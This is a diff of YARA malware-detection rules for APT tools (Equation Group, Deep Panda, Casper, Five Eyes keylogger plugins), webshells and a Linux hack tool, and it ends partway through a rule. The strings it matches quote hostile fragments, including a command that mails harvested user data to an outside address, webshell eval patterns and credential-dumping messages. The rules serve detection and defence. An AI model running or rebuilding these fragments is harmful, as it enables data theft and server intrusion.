+rule WoolenGoldfish_Sample_1_RID3006 : APT DEMO G0130 {
+   meta:
+      description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+      author = "Florian Roth"
+      reference = "http://goo.gl/NpJpVZ"
+      date = "2015-03-25 12:22:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0130"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Cannot execute (%d)" fullword ascii
+      $s16 = "SvcName" fullword ascii
+   condition: 
+      all of them
+}
+
+rule WoolenGoldfish_Generic_1_RID3061 : APT DEMO G0130 GEN {
+   meta:
+      description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+      author = "Florian Roth"
+      reference = "http://goo.gl/NpJpVZ"
+      date = "2015-03-25 12:37:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+      hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
+      tags = "APT, DEMO, G0130, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x0 = "Users\\Wool3n.H4t\\" 
+      $x1 = "C-CPP\\CWoolger" 
+      $x2 = "NTSuser.exe" fullword wide
+      $s1 = "107.6.181.116" fullword wide
+      $s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+      $s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+      $s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+      $s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+      $s6 = "wlg.dat" fullword
+      $s7 = "woolger" fullword wide
+      $s8 = "[Enter]" fullword
+      $s9 = "[Control]" fullword
+   condition: 
+      ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) )
+}
+
+rule WoolenGoldfish_Generic_2_RID3062 : APT DEMO G0130 GEN {
+   meta:
+      description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+      author = "Florian Roth"
+      reference = "http://goo.gl/NpJpVZ"
+      date = "2015-03-25 12:37:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+      hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+      hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+      tags = "APT, DEMO, G0130, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+   condition: 
+      all of them
+}
+
+rule EquationDrug_HDDSSD_Op_RID2F20 : APT DEMO {
+   meta:
+      description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
+      author = "Florian Roth"
+      reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+      date = "2015-03-11 11:43:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-01-19"
+      type = "file"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "nls_933w.dll" fullword ascii
+   condition: 
+      all of them
+}
+
+rule EquationDrug_NetworkSniffer3_RID3232 : APT DEMO T1040 {
+   meta:
+      description = "EquationDrug - Network Sniffer - tdip.sys"
+      author = "Florian Roth"
+      reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+      date = "2015-03-11 13:54:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, T1040"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Corporation. All rights reserved." fullword wide
+      $s1 = "IP Transport Driver" fullword wide
+      $s2 = "tdip.sys" fullword wide
+      $s3 = "tdip.pdb" fullword ascii
+   condition: 
+      all of them
+}
+
+rule EquationDrug_VolRec_Driver_RID315E : APT DEMO {
+   meta:
+      description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+      author = "Florian Roth"
+      reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+      date = "2015-03-11 13:19:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "msrstd.sys" fullword wide
+      $s1 = "msrstd.pdb" fullword ascii
+      $s2 = "msrstd driver" fullword wide
+   condition: 
+      all of them
+}
+
+rule EquationDrug_FileSystem_Filter_RID3312 : APT DEMO {
+   meta:
+      description = "EquationDrug - Filesystem filter driver volrec.sys, scsi2mgr.sys"
+      author = "Florian Roth"
+      reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+      date = "2015-03-11 14:32:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "volrec.sys" fullword wide
+      $s1 = "volrec.pdb" fullword ascii
+      $s2 = "Volume recognizer driver" fullword wide
+   condition: 
+      all of them
+}
+
+rule ChinaChopper_Generic_RID2EE1 : CHINA DEMO GEN T1100 WEBSHELL {
+   meta:
+      description = "China Chopper Webshells - PHP and ASPX"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf"
+      date = "2015-03-10 11:33:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-10-27"
+      tags = "CHINA, DEMO, GEN, T1100, WEBSHELL"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(Request\.Item\[.{,100}unsafe/ 
+      $x_php = /<?php.\@eval\(\$_POST./ 
+      $fp1 = "GET /" 
+      $fp2 = "POST /" 
+   condition: 
+      filesize < 300KB and 1 of ( $x* ) and not 1 of ( $fp* )
+}
+
+rule Casper_Included_Strings_RID303F : APT DEMO EXE FILE MAL T1082 {
+   meta:
+      description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+      author = "Florian Roth"
+      reference = "http://goo.gl/VRJNLo"
+      date = "2015-03-06 12:31:41"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL, T1082"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST" 
+      $a1 = "& SYSTEMINFO) ELSE EXIT" 
+      $c1 = "domcommon.exe" wide fullword
+      $c2 = "jpic.gov.sy" fullword
+      $c3 = "aiomgr.exe" wide fullword
+      $c4 = "perfaudio.dat" fullword
+      $c5 = "Casper_DLL.dll" fullword
+      $c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } 
+      $c7 = "{4216567A-4512-9825-7745F856}" fullword
+   condition: 
+      all of ( $a* ) or ( uint16 ( 0 ) == 0x5a4d and 1 of ( $c* ) )
+}
+
+rule Casper_SystemInformation_Output_RID33C9 : APT DEMO MAL {
+   meta:
+      description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+      author = "Florian Roth"
+      reference = "http://goo.gl/VRJNLo"
+      date = "2015-03-06 15:02:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a0 = "***** SYSTEM INFORMATION ******" 
+      $a1 = "***** SECURITY INFORMATION ******" 
+      $a2 = "Antivirus: " 
+      $a3 = "Firewall: " 
+      $a4 = "***** EXECUTION CONTEXT ******" 
+      $a5 = "Identity: " 
+      $a6 = "<CONFIG TIMESTAMP=" 
+   condition: 
+      all of them
+}
+
+rule Casper_EXE_Dropper_RID2DEB : APT DEMO MAL {
+   meta:
+      description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+      author = "Florian Roth"
+      reference = "http://goo.gl/VRJNLo"
+      date = "2015-03-05 10:52:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<Command>" fullword ascii
+      $s1 = "</Command>" fullword ascii
+      $s2 = "\" /d \"" fullword ascii
+      $s4 = "'%s' %s" fullword ascii
+      $s5 = "nKERNEL32.DLL" fullword wide
+      $s6 = "@ReturnValue" fullword wide
+      $s7 = "ID: 0x%x" fullword ascii
+      $s8 = "Name: %S" fullword ascii
+   condition: 
+      7 of them
+}
+
+rule Equation_Kaspersky_GreyFishInstaller_RID35A1 : APT DEMO G0020 MAL {
+   meta:
+      description = "Equation Group Malware - Grey Fish"
+      author = "Florian Roth"
+      reference = "http://goo.gl/ivt8EW"
+      date = "2015-02-16 16:21:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0020, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "DOGROUND.exe" fullword wide
+      $s1 = "Windows Configuration Services" fullword wide
+      $s2 = "GetMappedFilenameW" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Equation_Kaspersky_EquationLaserInstaller_RID37BD : APT DEMO EXE FILE G0020 MAL {
+   meta:
+      description = "Equation Group Malware - EquationLaser Installer"
+      author = "Florian Roth"
+      reference = "http://goo.gl/ivt8EW"
+      date = "2015-02-16 17:51:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0020, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Failed to get Windows version" fullword ascii
+      $s1 = "lsasrv32.dll and lsass.exe" fullword wide
+      $s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+      $s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+      $s4 = "lsasrv32.dll" fullword ascii
+      $s6 = "%s %02x %s" fullword ascii
+      $s7 = "VIEWERS" fullword ascii
+      $s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d ) and filesize < 250000 and 6 of ( $s* )
+}
+
+rule Equation_Kaspersky_FannyWorm_RID3273 : APT DEMO EXE FILE G0020 MAL T1050 {
+   meta:
+      description = "Equation Group Malware - Fanny Worm"
+      author = "Florian Roth"
+      reference = "http://goo.gl/ivt8EW"
+      date = "2015-02-16 14:05:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "APT, DEMO, EXE, FILE, G0020, MAL, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "x:\\fanny.bmp" fullword ascii
+      $s2 = "32.exe" fullword ascii
+      $s3 = "d:\\fanny.bmp" fullword ascii
+      $x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+      $x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+      $x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+      $x4 = "\\system32\\win32k.sys" wide
+      $x5 = "\\AGENTCPD.DLL" ascii
+      $x6 = "agentcpd.dll" fullword ascii
+      $x7 = "PADupdate.exe" fullword ascii
+      $x8 = "dll_installer.dll" fullword ascii
+      $x9 = "\\restore\\" ascii
+      $x10 = "Q:\\__?__.lnk" fullword ascii
+      $x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+      $x12 = "\\shelldoc.dll" ascii
+      $x13 = "file size = %d bytes" fullword ascii
+      $x14 = "\\MSAgent" ascii
+      $x15 = "Global\\RPCMutex" fullword ascii
+      $x16 = "Global\\DirectMarketing" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d ) and filesize < 300000 and ( ( 2 of ( $s* ) ) or ( 1 of ( $s* ) and 6 of ( $x* ) ) or ( 14 of ( $x* ) ) )
+}
+
+rule MAL_Enfal_Nov22_RID2C26 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects a certain type of Enfal Malware"
+      author = "Florian Roth"
+      reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
+      date = "2015-02-10 09:36:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash2 = "42fa6241ab94c73c7ab386d600fae70da505d752daab2e61819a0142b531078a"
+      hash2 = "42fa6241ab94c73c7ab386d600fae70da505d752daab2e61819a0142b531078a"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xop1 = { 00 00 83 c9 ff 33 c0 f2 ae f7 d1 49 b8 ff 8f 01 00 2b c1 } 
+      $s1 = "POWERPNT.exe" fullword ascii
+      $s2 = "%APPDATA%\\Microsoft\\Windows\\" ascii
+      $s3 = "%HOMEPATH%" fullword ascii
+      $s4 = "Server2008" fullword ascii
+      $s5 = "%ComSpec%" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 3 of ( $s* ) )
+}
+
+rule DeepPanda_sl_txt_packed_RID3037 : APT CHINA DEMO G0009 T1045 {
+   meta:
+      description = "Hack Deep Panda - FBI Liaison Alert System # A-000049-MW - ScanLine sl-txt-packed"
+      author = "Florian Roth"
+      reference = "http://krebsonsecurity.com/wp-content/uploads/2015/02/FBI-Flash-Warning-Deep-Panda.pdf"
+      date = "2015-02-08 12:30:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, G0009, T1045"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Command line port scanner" fullword wide
+      $s1 = "sl.exe" fullword wide
+      $s2 = "CPports.txt" fullword ascii
+      $s3 = ",GET / HTTP/.}" fullword ascii
+      $s4 = "Foundstone Inc." fullword wide
+      $s9 = " 2002 Foundstone Inc." fullword wide
+      $s15 = ", Inc. 2002" fullword ascii
+      $s20 = "ICMP Time" fullword ascii
+   condition: 
+      all of them
+}
+
+rule DeepPanda_lot1_RID2C52 : APT CHINA DEMO G0009 T1003 {
+   meta:
+      description = "Hack Deep Panda - FBI Liaison Alert System # A-000049-MW - lot1.tmp-pwdump"
+      author = "Florian Roth"
+      reference = "http://krebsonsecurity.com/wp-content/uploads/2015/02/FBI-Flash-Warning-Deep-Panda.pdf"
+      date = "2015-02-08 09:44:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, G0009, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Unable to open target process: %d, pid %d" fullword ascii
+      $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+      $s2 = "Target: Failed to load SAM functions." fullword ascii
+      $s5 = "Error writing the test file %s, skipping this share" fullword ascii
+      $s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+      $s8 = "Service start failed: %d (%s/%s)" fullword ascii
+      $s12 = "PwDump.exe" fullword ascii
+      $s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+      $s14 = ":\\\\.\\pipe\\%s" fullword ascii
+      $s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+      $s16 = "dump logon session" fullword ascii
+      $s17 = "Timed out waiting to get our pipe back" fullword ascii
+      $s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+      $s20 = "%s\\%s.exe" fullword ascii
+   condition: 
+      10 of them
+}
+
+rule DeepPanda_htran_exe_RID2E90 : APT CHINA DEMO G0009 T1020 T1090 {
+   meta:
+      description = "Hack Deep Panda - htran-exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2015-02-08 11:19:51"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, G0009, T1020, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+      $s2 = "\\Release\\htran.pdb" ascii
+      $s3 = "[SERVER]connection to %s:%d error" fullword ascii
+      $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+      $s8 = "======================== htran V%s =======================" fullword ascii
+      $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+      $s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+      $s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule DeepPanda_Trojan_Kakfum_RID2FFE : APT CHINA DEMO G0009 MAL {
+   meta:
+      description = "Hack Deep Panda - FBI Liaison Alert System # A-000049-MW - Trojan.Kakfum sqlsrv32.dll"
+      author = "Florian Roth"
+      reference = "http://krebsonsecurity.com/wp-content/uploads/2015/02/FBI-Flash-Warning-Deep-Panda.pdf"
+      date = "2015-02-08 12:20:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+      hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
+      tags = "APT, CHINA, DEMO, G0009, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+      $s1 = "%s\\sqlsrv32.dll" fullword ascii
+      $s2 = "%s\\sqlsrv64.dll" fullword ascii
+      $s3 = "%s\\%d.tmp" fullword ascii
+      $s4 = "ServiceMaix" fullword ascii
+      $s15 = "sqlserver" fullword ascii
+   condition: 
+      all of them
+}
+
+rule ASPXspy2_RID29DB : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web shell - file ASPXspy2_RID29DB.aspx"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2015-01-24 01:50:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+      $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+      $s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+      $s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+      $s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+      $s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+      $s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+      $s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+      $s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+      $s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+      $s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+      $s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+      $s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+      $s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+   condition: 
+      6 of them
+}
+
+rule LinuxHacktool_eyes_a_RID2F2B : DEMO HKTL LINUX {
+   meta:
+      description = "Linux hack tools - file a"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2015-01-19 11:45:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+      $s1 = "mv scan.log bios.txt" fullword ascii
+      $s2 = "rm -rf bios.txt" fullword ascii
+      $s3 = "echo -e \"# by Eyes.\"" fullword ascii
+      $s4 = "././pscan2 $1 22" fullword ascii
+      $s10 = "echo \"#cautam...\"" fullword ascii
+   condition: 
+      2 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_dll_RID33D5 : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 15:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+      $s1 = "20121.dll" fullword ascii
+   condition: 
+      all of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20121_RID33A3 : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20121.xml"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 14:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+      $s1 = "<name>20121.dll</name>" fullword ascii
+      $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+      $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+      $s4 = "<platform type=\"1\">" fullword ascii
+      $s5 = "</plugin>" fullword ascii
+      $s6 = "</pluginConfig>" fullword ascii
+      $s7 = "<pluginConfig>" fullword ascii
+      $s8 = "</platform>" fullword ascii
+      $s9 = "</lpConfig>" fullword ascii
+      $s10 = "<lpConfig>" fullword ascii
+   condition: 
+      9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_sys_RID33FA : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 15:10:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "20123.dll" fullword ascii
+      $s1 = "kbdclass.sys" fullword wide
+      $s2 = "IoFreeMdl" fullword ascii
+      $s3 = "ntoskrnl.exe" fullword ascii
+      $s4 = "KfReleaseSpinLock" fullword ascii
+   condition: 
+      all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef_RID34DE : APT DEMO MAL T1220 {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 15:48:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL, T1220"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+      $s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+      $s2 = "<commands/>" fullword ascii
+      $s3 = "</version>" fullword ascii
+      $s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+      $s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+      $s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+      $s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+      $s8 = "<dllDepend>None</dllDepend>" fullword ascii
+      $s9 = "<minorType>0</minorType>" fullword ascii
+      $s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+      $s11 = "</comments>" fullword ascii
+      $s12 = "<comments>" fullword ascii
+      $s13 = "<majorType>1</majorType>" fullword ascii
+      $s14 = "<files>None</files>" fullword ascii
+      $s15 = "<poc>Erebus</poc>" fullword ascii
+      $s16 = "</plugin>" fullword ascii
+      $s17 = "<team>None</team>" fullword ascii
+      $s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+      $s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+      $s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+   condition: 
+      14 of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20123_RID33A5 : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20123.xml"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 14:56:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+      $s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+      $s2 = "<name>20123.sys</name>" fullword ascii
+      $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+      $s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+      $s5 = "<platform type=\"1\">" fullword ascii
+      $s6 = "</plugin>" fullword ascii
+      $s7 = "</pluginConfig>" fullword ascii
+      $s8 = "<pluginConfig>" fullword ascii
+      $s9 = "</platform>" fullword ascii
+      $s10 = "</lpConfig>" fullword ascii
+      $s11 = "<lpConfig>" fullword ascii
+   condition: 
+      9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef_RID34DB : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 15:48:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "This PPC gets the current keystroke log." fullword ascii
+      $s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+      $s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+      $s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+      $s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+      $s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+      $s6 = "<name>Get Keystroke Log</name>" fullword ascii
+      $s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+      $s8 = "<definition>display help for this function</definition>" fullword ascii
+      $s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+      $s10 = "Set the log limit (in number of windows)" fullword ascii
+      $s11 = "<example>qwgetlog</example>" fullword ascii
+      $s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+      $s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+      $s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+      $s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+      $s16 = "<command id=\"32\">" fullword ascii
+      $s17 = "<command id=\"3\">" fullword ascii
+      $s18 = "<command id=\"7\">" fullword ascii
+      $s19 = "<command id=\"1\">" fullword ascii
+      $s20 = "<command id=\"4\">" fullword ascii
+   condition: 
+      10 of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20120_RID33A2 : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20120.xml"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 14:56:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+      $s1 = "<name>20120.dll</name>" fullword ascii
